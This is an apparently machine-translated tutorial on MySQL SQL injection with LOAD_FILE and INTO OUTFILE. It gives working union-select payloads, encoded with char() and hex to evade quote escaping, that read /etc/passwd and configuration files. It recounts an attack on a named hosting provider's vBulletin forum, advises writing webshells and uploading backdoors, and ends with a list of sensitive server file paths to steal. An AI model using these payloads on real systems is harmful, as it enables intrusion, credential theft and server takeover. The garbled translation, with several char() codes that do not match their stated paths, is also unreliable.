Use of mysql LOAD_FILE in database injection

Known as one of the most popular open source database, MySQL is widely used in various scenarios, Alibaba Cloud provides high available ApsaraDB RDS for MySQL with enhanced MySQL service reduced enterprise’s database expenses, and helped enterprises utilize technology to fight against coronavirus.

 

The LOAD_FILE function can be used only when the following two conditions are met:

1. File permission: chmod a + r pathtofile
2. File size: must be smaller than max_allowed_packet

The following code uses LOAD_FILE to obtain sensitive system information:

SELECT LOAD_FILE ('d:/xampp/htdocs/www/wanju/htaccess.txt ')

SELECT LOAD_FILE ('/etc/hosts ')

Here, we can think of what we can do, that is, read some confidential files, but there are also restrictions:

1. You must have the permission to read and the file must be fully readable.
And (select count (*) from mysql. user)> 0/* if the result returns normal, it indicates that you have read and write permissions.
And (select count (*) from mysql. user)> 0/* an error is returned. The administrator has downgraded the database account.

2. Files to be read must be on the server

3. The complete file path must be specified.

4. The file to be read must be smaller than max_allowed_packet

If the file does not exist or cannot be read for any of the above reasons, the function returns null. What is more difficult to meet is the permission. In windows, if NTFS is properly set, the relevant files cannot be read. When the file is accessible only by administrators, users should not consider load_file.

In actual injection, we have two difficulties to solve:

Absolute physical path

Construct valid malformed statements

In many PHP programs, when a wrong Query is submitted, if display_errors = on, the program will expose the absolute path of the WEB directory, as long as the path is known, for a PHP program that can be injected, the security of the entire server will be seriously threatened. Constructor statements are meaningless.

Exploitation

Assume that the SQL statement of a program is as follows:

SELECT * FROM article WHERE articleid = $ id

Note: The current condition is magic_quotes_gpc = off, and c:/boot. ini is readable.

In this case, we construct $ id:

-1 union select, load_file ('C:/boot. ini ')

Our Query becomes:

SELECT * FROM article WHERE articleid =-1 union select, load_file ('C:/boot. ini ')

The program will display the c:/boot. ini content honestly, but currently there are few hosts with magic_quotes_gpc = off. How can we construct a statement without quotation marks? Those who have read SQL Injection with MySQL certainly know that they use the char () function or convert characters to hexadecimal notation.

Note: The current condition is magic_quotes_gpc = on, c:/boot. ini readable.

We construct $ id:

-1 union select 111,111,116, 1, load_file (char (46,105,110,105 ))

"Char (111,111,116, 46,105,110,105,)" is the ASCII code of "c:/boot. ini", and our Query becomes:

SELECT * FROM article WHERE articleid =-1 union select 111,111,116, 1, load_file (char (46,105,110,105 ))

We can also successfully read boot. the INI file also converts the string to hexadecimal, "c:/boot. the hexadecimal value of ini is "0x633a2f626f6f742e696e69", so the preceding statement can be as follows:

SELECT * FROM article WHERE articleid =-1 union select 1, 1, load_file (0x633a2f626f6f742e696e69)

It's a little short. Let's look at your preferences. You can enter the following query in phpmyadmin or mysql> to study it slowly.

SELECT load_file ([string])

Of course, in practical applications, due to various restrictions, the file content may not be displayed. We can also use into outfile to export the file. Everyone knows how to use it, and I will not talk about the details. Read an instance to explain everything.

Instance

Www. * ** host.cn is a famous FreeBSD host provider in China. We will test it with him because its forum uses calendar ar. for VBB forums with php problems, I do not need to go anywhere to find websites with vulnerabilities (although they are everywhere ). This is a complete security test. I only get the information, but I have not entered the server.

Here is a bit of code about global. php under the root directory of VBB, as follows:

// Get rid of slashes in get/post/cookie data

Function stripslashesarray (& $ arr ){

While (list ($ key, $ val) = each ($ arr )){

If ($ key! = "Templatesused" and $ key! = "Argc" and $ key! = "Argv "){

If (is_string ($ val) AND (strtoupper ($ key )! = $ Key OR ("". intval ($ key) = "$ key "))){

$ Arr ["$ key"] = stripslashes ($ val );

} Else if (is_array ($ val) AND ($ key = 'http _ post_vars' OR $ key = 'http _ get_vars' OR strtoupper ($ key )! = $ Key )){

$ Arr ["$ key"] = stripslashesarray ($ val );

}

}

}

Return $ arr;

}

If (get_magic_quotes_gpc () and is_array ($ GLOBALS )){

If (isset ($ attachment )){

$ GLOBALS ['attachment'] = addslashes ($ GLOBALS ['attachment']);

}

If (isset ($ avatarfile )){

$ GLOBALS ['avatarfile'] = addslashes ($ GLOBALS ['avatarfile']);

}

$ GLOBALS = stripslashesarray ($ GLOBALS );

}

Set_magic_quotes_runtime (0 );

This code removes the escape characters before all special characters if magic_quotes_gpc is enabled. in ini, the status of magic_quotes_gpc does not affect the single quotes we enter. You can inject them with confidence. Haha.

We know, submit:

/Calendar. php? Action = edit & eventid = 1 union select 1, 1, 1, 1, username, password FROM user WHERE userid = 1

It is possible to obtain the MD5 hash of the user name and password, but it is not displayed for special reasons. However, based on my experience, I know that there is no construction error, therefore, we can read and export data to a file.

Because I accidentally accessed a file containing phpinfo () in advance, I knew the absolute path of the WEB. From the result of the visit to the site, I found that an HTML file was generated by a download system, if the directory does not have the write permission, HTML files cannot be generated, but this is not the focus of this article. We have the following information:

Absolute WEB path:/home/4 ngel

Writable directory path:/home/4 ngel/soft/

Magic_quotes_gpc = on

Compared with the host root, the admin of the Forum is nothing at all, and I am not interested in the admin of the forum. We want to read the configuration file of the Forum and/etc/passwd, if you know the connection information of MySQL, you can start from here and write webshell or other things. If you know/etc/passwd, we can run the password. Go directly to ssh.

The configuration file of the VBB forum is in/home/4 ngel/forum/admin/config. php and converted into ASCII code. Submit:

Calendar. php? Action = edit & eventid = 1 union select 47,104,111,109,101, 110,103,101,108, 1, load_file (char (47,102,111,114,117,109, 100,109,105,110, 111,110,102,105,103, 46,112,104,112 )) FROM user WHERE userid = 1 into outfile '/home/4 ngel/soft/cfg.txt'

Remember to add a where clause to set a condition. Otherwise, if there are many forum users, the exported file will be quite large. Or you can simply specify $ eventid as a non-existent value, so you don't need where, just like this:

Calendar. php? Action = edit & eventid =-1 union select 47,104,111,109,101, 110,103,101,108, 1, load_file (char (47,102,111,114,117,109, 100,109,105,110, 111,110,102,105,103, 46,112,104,112 )) FROM user into outfile '/home/4 ngel/soft/cfg.txt'

Convert/etc/passwd to ASCII code and submit:

Calendar. php? Action = edit & eventid =-1 union select 47,101,116, 115,115,119,100, 1, load_file (char )) FROM user into outfile '/home/4 ngel/soft/etcpwd.txt'

Note that the following error message is displayed at the top of the forum:

Warning: mysql_fetch_array (): supplied argument is not a valid MySQL result resource in/home/4 ngel/forum/admin/db_mysql.php on line 154

Experience tells us that the file has been exported successfully and submitted:

Http://www.xxxhost.cn/soft/cfg.txt

Http://www.xxxhost.cn/soft/etcpwd.txt

When the dark night and pig invade into gray, the passwords are displayed one by one, spoofing, logging on to the background, uploading backdoors, and reading config. php, a series of steps, I will get a load_file. Is it very harmful?

I remember discussing in a group that everyone entered the black and white servers through the 9 *. net website, but there was no way to rush into black and white servers. With the load_file () function, you can access the server where the black and white are located after knowing some information. The process is the same as the above, using show. php vulnerability, directly load_file out of the program configuration file, know mysql information, remote connection, write database export file, it is easy to get the server admin.

Postscript:
About MYSQL into outfile injection
In fact, there have been many articles about mysql injection on the Internet ~ But there is still a lack of emphasis ~ Use into outfile to write the code to the web Directory and obtain WEBSHELL.
First, three innate conditions are required.
 
① Know the physical path (into outfile 'physical path') so that you can write to the Directory
 
② Union can be used (that is, MySQL 3 or a later version is required)
 
③ The other party does not filter '(because ''after outfile cannot be replaced by other functions)
 
The day after tomorrow requires two conditions
 
① The MYSQL User has the file_priv permission (otherwise, the user cannot write or read the file content)
 
② Systems that have write permissions on web directories do not need to talk about it. Generally, they have permissions ~ But * nix systems! Generally, rwxr-xr-x means that the group and other users do not have the permission to write operations, so it is quite difficult to meet these five conditions.

Mysql loadfile () common usage

1. replace (load_file (0 × 2F6574632F706173737764), 0 × 3c, 0 × 20)

2. replace (load_file (char (47,101,116, 115,115,119,100,), char (60), char (32 ))
The above two items show the full code in a php file. Sometimes some characters are not replaced. For example, "<" is replaced with "space" and the webpage is returned. The code cannot be viewed.

3. load_file (char (47) can be used to list the root directories of FreeBSD and Sunos systems.

4. View the configuration file of the linux APACHE virtual host in/etc/httpd/conf/httpd. conf or/usr/local/apche/conf/httpd. conf.

5. Run c: Program FilesApache GroupApacheconf httpd. conf or C: apacheconf httpd. conf to view the apache file in WINDOWS.

6. Run c:/Resin-3.0.14/conf/resin. conf to view the resin file configuration of the website developed by jsp.

7. c:/Resin/conf/resin. conf/usr/local/resin/conf/resin. conf

8. d: APACHEApache2confhttpd. conf

9. C: Program Filesmysqlmy. ini

10../themes/darkblue_orange/layout. inc. php phpmyadmin burst path

11. c: windowssystem32inetsrvMetaBase. xml: view the virtual host configuration file of IIS

12. View the resin configuration file 3.0.22 in/usr/local/resin-3.0.22/conf/RESIN. conf.

13./usr/local/resin-pro-3.0.22/conf/resin. conf is the same as above.

14./usr/local/app/apache2/conf/extra/httpd-vhosts.conf apashe vm view

15. View firewall policies in/etc/sysconfig/iptables.

16. Equivalent settings of usr/local/app/php5/lib/php. ini PHP

17./etc/my. cnf MYSQL configuration file

18. System version of/etc/redhat-release Red Hat

19. C: mysqldatamysqluser. MYD has the user password in MYSQL.

20,/etc/sysconfig/network-scripts/ifcfg-eth0 to view the IP.

21./usr/local/app/php5/lib/php. ini // PHP settings

22,/usr/local/app/apache2/conf/extra/httpd-vhosts.conf // virtual website settings

23. c: Program FilesRhinoSoft. ComServ-UServUDaemon.ini

24. c: windowsmy. ini